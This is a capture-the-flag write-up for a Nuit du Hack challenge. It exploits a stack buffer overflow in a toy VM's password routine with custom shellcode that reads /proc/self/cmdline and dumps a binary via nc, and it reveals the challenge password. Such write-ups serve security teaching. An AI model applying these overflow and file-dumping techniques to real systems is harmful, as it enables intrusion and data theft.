hi,

i was discretely wandering around as usual yesterday. a couple of system
developpers were shouting about corporate devices quality decreasing every year
when they finally agreed about using local network to transfer some pictures.
from the dead usb key i managed to recover from the trashcan and to clean, i
finally extracted a couple of megabytes of unaltered data. worthless corporate
mails, personal pictures i decided to keep for my private use and few
interesting files, especially some asm source code that you might find
valuable.

i attached one of them, please contact me if you would like any further
investigation about those pieces of code.

; test program #1 - build #35 for scipad
; http://sciteek.nuitduhack.com

; some includes
#include inc/stdlib.inc

; this routine asks for a password and put the address in r5 and the size in r0

.label ask_password
; display a prompt
movl r0, :pwd_msg
call :print

; allocate some space on stack
subb sp, #8
mov r5, sp
movl r0, stdin
mov r1, r5
movb r2, #10

; read the password from stdin
call :read

; restore the stack pointer
addb sp, #8

; return
ret


; our main
;
; basically, this program does nothing useful ... it is just a sample ;)

.label main
; display a welcome message
movl r0, :welcome
call :print

; ask for a password
call :ask_password

; displays an error
movl r0, :error
call :print

; quit
end

; temp routine (not used anymore)

.label temp_routine
movl r0, :flag_file
call :disp_file_content
end

.label welcome
.db "welcome on sciteek' scipad secure shell !",0x0a,0

.label pwd_msg
.db "please enter your passphrase: ",0

.label error
.db "nope. it is not the good password",0x0a,0

.label hint
.db "sciteek.nuitduhack.com:4000",0

.label flag_file

This service vulnerability is a simple stack based buffer overflow. We are able to overwrite return address of ask_password function, but service running on remote server wasn’t compiled from these exact sources, because received data size equals to 0x64.

There is no ASLR, or NX on, so we can execute whatever we want from this buffer.

We wrote a simple shellcode to read /proc/self files :

MOVB    R0, #0x2
MOVL    R1, :filename
MOVB    R2, #0x0
SYSCALL         ; open(filename, O_RDONLY)
MOV     R7, R0

.label :loop
MOVB    R0, #0x03
MOV     R1, R7
MOV     R2, SP
MOVB    R3, #0x01
SYSCALL         ; read(fd, sp, 1)
TEST    R0, R0
JNZ     :read_ok
END

.label :read_ok
MOVB    R0, #0x04
MOVB    R1, #0x01
MOV     R2, SP
MOVB    R3, #0x01
SYSCALL         ; write(stdout, sp, 1)
JMPS    :loop

.label :filename
.ascii "/proc/self/cmdline"

Scheme of exploitation is very simple :

[SHELLCODE] [NULL_PADDING] [BUFFER_ADDR]

And here is the exploit:

> nc sciteek.nuitduhack.com 4004 < shellcode_proc
Password (required): /usr/local/challenge/vmndh/vmndh4-file/usr/local/challenge/vmndh/exploitmes/exploitme2.ndh

We can see that vm binary is located into /usr/local/challenge/vmndh/exploitmes/ and sercices run into /usr/local/challenge/vmndh/vmndh4, so by replacing /proc/self/cmdline by “../exploitmes/exploitme2.ndh”, we are able to dump it.

> nc sciteek.nuitduhack.com 4004 < shellcode_dump > bin_4004_dump
> strings bin_4004_dump
Password (required): .NDH
Password (required):
sciteek.nuitduhack.com:4004
Bad password.
You are now authenticated
ZomfgSciPadWillR0xxD4Fuck1nw0RLd!!!

Password was : ZomfgSciPadWillR0xxD4Fuck1nw0RLd!!!